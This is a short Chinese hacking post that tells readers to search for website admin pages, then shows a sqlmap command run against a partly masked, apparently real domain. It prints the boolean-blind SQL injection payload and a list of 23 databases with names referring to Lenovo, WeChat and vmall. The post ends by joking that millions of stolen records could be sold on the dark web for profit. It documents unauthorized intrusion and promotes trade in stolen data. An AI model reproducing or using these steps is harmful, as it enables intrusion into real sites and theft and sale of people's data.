首先选择需要扫描的站点,最简单粗暴的方法就是浏览器直接搜索,什么?不会?自行gu狗吧。
比如我要扫描后台,看得懂的扣1,看不懂的也扣1。
然后,你就可以看到好多好多网站的后台,随便点一个进去,慢慢折腾。
就这样的方法,搞到一SQL注入点
python sqlma.py -u http://dianping.******com.cn/valuation/index.php/index/search?k=think --dbs
python大法好,sqlmap大法更好。不会用的自行gu狗
注入点注入,得到数据库
Place: GET Parameter: k Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: k=think') AND 2578=2578 AND ('QNdm'='QNdm --- back-end DBMS: MySQL >= 5.0.0 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: k Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: k=think') AND 2578=2578 AND ('QNdm'='QNdm --- back-end DBMS: MySQL 5 available databases [23]: [*] antispam [*] information_schema [*] lenovo_osd [*] lenovo_report [*] lenovovaluation [*] lenovovaluation_test [*] lenovoweixin [*] lwttest [*] mysql [*] performance_schema [*] report [*] rrwechat [*] test [*] testa [*] valuation_uat [*] vmall [*] vmall_test [*] weixin [*] weixin_ceshi [*] weixin_test [*] weixin_uat [*] wxshopuat [*] yunyingweixin
随便进入一个表,
这信息好像并没有什么ruan用,但是,仅仅只是这信息没什么用而已,在某些“下面的网”一条信息 可能就价值一两块,你有几百万条数据,不直接迎娶白富美,走向人生巅峰。(也有可能送你一副白金手镯 手动滑稽0.0)
